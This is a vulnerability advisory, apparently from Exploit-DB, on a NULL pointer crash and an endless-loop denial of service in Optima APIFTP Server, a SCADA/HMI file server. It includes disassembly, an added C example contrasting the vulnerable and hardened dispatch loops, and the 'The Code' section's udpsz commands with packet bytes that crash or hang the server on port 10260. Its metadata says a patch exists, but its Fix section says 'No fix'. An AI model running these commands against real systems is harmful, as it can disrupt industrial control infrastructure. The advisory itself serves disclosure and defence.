Vendor: Optima APIFTP Server
Author: Luigi Auriemma
CVSS: 7.5 (HIGH)
Title: NULL pointer and endless loop
CWE: 119, 835
Product Name: Optima APIFTP Server
Affected Version From: 1.5.2.13
Affected Version To: 1.5.2.13
Patch Exists: YES
Related CWE: N/A
CPE: a:optimalog:optima_apiftp_server
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: Windows
Year: 2011

Optima APIFTP Server <= 1.5.2.13 Vulnerabilities

Optima is a suite of automation software for controlling PLCs via a SCADA/HMI interface. APIFTP Server is a file server for working with remote files located on shared folders. A NULL pointer dereference is reachable through overly long path names: the server displays a MessageBox with the error and then continues executing, which leads to stack exhaustion after some seconds and the termination of the server. Incomplete packets cause an endless loop with the CPU at 100%.

Mitigation:

Upgrade to the latest version of Optima APIFTP Server

Exploit-DB raw data:

#######################################################################

                             Luigi Auriemma

Application:  Optima APIFTP Server
              http://www.optimalog.com/home.html
Versions:     <= 1.5.2.13
Platforms:    Windows
Bugs:         A] NULL pointer
              B] endless loop
Exploitation: remote
Date:         13 Nov 2011
Author:       Luigi Auriemma
              e-mail: aluigi@autistici.org
              web:    aluigi.org


#######################################################################


1) Introduction
2) Bugs
3) The Code
4) Fix


#######################################################################

===============
1) Introduction
===============


Optima is a suite of automation software for controlling PLC via
SCADA/HMI interface.
APIFTP Server is a file server for working with remote files located on
shared folders.


#######################################################################

=======
2) Bugs
=======

---------------
A] NULL pointer
---------------

NULL pointer exploitable through too long path names.
The effect is the displaying of a MessageBox with the error and the
continuing of the execution that will lead to a stack exhaustion after
some seconds and the termination of the server.


---------------
B] endless loop
---------------

Endless loop with CPU at 100% caused by incomplete packets:

  004A9C93   8B03             /MOV EAX,DWORD PTR DS:[EBX]
  004A9C95   8B80 78010000    |MOV EAX,DWORD PTR DS:[EAX+178]
  004A9C9B   2D B80B0000      |SUB EAX,0BB8     ; Switch (cases BB8..BE0)
  004A9CA0   74 19            |JE SHORT APIFTPSe.004A9CBB
  004A9CA2   83E8 14          |SUB EAX,14
  004A9CA5   74 47            |JE SHORT APIFTPSe.004A9CEE
  004A9CA7   83E8 0A          |SUB EAX,0A
  004A9CAA   0F84 9D000000    |JE APIFTPSe.004A9D4D
  004A9CB0   83E8 0A          |SUB EAX,0A
  004A9CB3   0F84 CA000000    |JE APIFTPSe.004A9D83
  004A9CB9  ^EB D8            |JMP SHORT APIFTPSe.004A9C93

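The listing above shows why an incomplete packet pins the CPU: the command id is read from the connection object (the field at offset 0x178), compared against the cases 0xBB8, 0xBCC, 0xBD6 and 0xBE0 (0xBB8, then +0x14, +0xA, +0xA), and when none matches the code jumps straight back to 004A9C93 without waiting for more data. The C below is an added example that is not part of the advisory or of the APIFTP Server code: it models that dispatch loop in its vulnerable shape beside a hardened shape that yields on a short header and fails closed on an unknown id. The `conn` struct, the field names, the return codes and the sample buffers are constructed for this example; only the four case values come from the disassembly.

```c
#include <stdio.h>
#include <stdint.h>
#include <stddef.h>

/* Case values taken from the disassembly: BB8, BB8+14, +A, +A. */
enum { CMD_A = 0xBB8, CMD_B = 0xBCC, CMD_C = 0xBD6, CMD_D = 0xBE0 };

enum dispatch_result {
    DISPATCH_OK = 0,        /* a known command was dispatched */
    DISPATCH_NEED_MORE = 1, /* header incomplete: wait for more bytes */
    DISPATCH_BAD_CMD = 2,   /* unknown command id: fail closed */
    DISPATCH_SPUN_OUT = 3   /* vulnerable loop hit the iteration cap */
};

/* Assumed connection object: bytes received so far plus the decoded id
 * (stands in for the field at +0x178 in the listing). */
struct conn {
    const uint8_t *buf;
    size_t len;
    uint32_t cmd;   /* 0 until a complete header has been decoded */
};

/* Decode the 4-byte little-endian command id only if it is all there.
 * Returns 1 on success, 0 when the packet is still incomplete. */
static int parse_header(struct conn *c) {
    if (c->len < 4)
        return 0;   /* cmd keeps its old value, exactly what the bug relies on */
    c->cmd = (uint32_t)c->buf[0] | ((uint32_t)c->buf[1] << 8) |
             ((uint32_t)c->buf[2] << 16) | ((uint32_t)c->buf[3] << 24);
    return 1;
}

/* Vulnerable shape: no case matches, so control jumps back to the top
 * without any new input being read. The iteration cap exists only so
 * this example terminates; the real loop in the listing has none. */
enum dispatch_result dispatch_vulnerable(struct conn *c, unsigned cap) {
    unsigned spins = 0;
    parse_header(c);
again:
    switch (c->cmd) {
    case CMD_A: case CMD_B: case CMD_C: case CMD_D:
        return DISPATCH_OK;
    default:
        if (++spins >= cap)
            return DISPATCH_SPUN_OUT;
        goto again;   /* corresponds to JMP SHORT APIFTPSe.004A9C93 */
    }
}

/* Hardened shape: a short header makes the caller wait for more data
 * (or time the connection out), and an id outside the switch is an
 * error. No path returns to the top of the loop without new input. */
enum dispatch_result dispatch_fixed(struct conn *c) {
    if (!parse_header(c))
        return DISPATCH_NEED_MORE;
    switch (c->cmd) {
    case CMD_A: case CMD_B: case CMD_C: case CMD_D:
        return DISPATCH_OK;
    default:
        return DISPATCH_BAD_CMD;
    }
}

/* Convenience wrappers that run each loop over a raw buffer. */
enum dispatch_result check_vulnerable(const uint8_t *buf, size_t len, unsigned cap) {
    struct conn c = { buf, len, 0 };
    return dispatch_vulnerable(&c, cap);
}

enum dispatch_result check_fixed(const uint8_t *buf, size_t len) {
    struct conn c = { buf, len, 0 };
    return dispatch_fixed(&c);
}

int main(void) {
    /* Constructed inputs: a complete known command (0xBCC), a truncated
     * header, and a complete header whose id is outside the switch. */
    static const uint8_t known[4]     = { 0xCC, 0x0B, 0x00, 0x00 };
    static const uint8_t truncated[2] = { 0xB8, 0x0B };
    static const uint8_t unknown[4]   = { 0x01, 0x00, 0x00, 0x00 };

    printf("known:     vulnerable=%d fixed=%d\n",
           check_vulnerable(known, sizeof known, 1000), check_fixed(known, sizeof known));
    printf("truncated: vulnerable=%d fixed=%d\n",
           check_vulnerable(truncated, sizeof truncated, 1000), check_fixed(truncated, sizeof truncated));
    printf("unknown:   vulnerable=%d fixed=%d\n",
           check_vulnerable(unknown, sizeof unknown, 1000), check_fixed(unknown, sizeof unknown));
    return 0;
}
```

The point of the two shapes is the `default` branch: the vulnerable loop treats "no match" as "try again" with the same bytes, so a truncated packet (the "e803 0400 00" case in the advisory) never makes progress, while the hardened loop turns the same input into a wait-for-more or a disconnect that a read timeout can bound.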

#######################################################################

===========
3) The Code
===========


http://aluigi.org/testz/udpsz.zip
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/18112.zip

A]
  udpsz -C "e803 0400 ff" -T -D -3 -d SERVER 10260 0x107

  wait some seconds, the tool will quit automatically

B]
  udpsz -C "e803 0400 00" -T -D SERVER 10260 -1


#######################################################################

======
4) Fix
======


No fix.


#######################################################################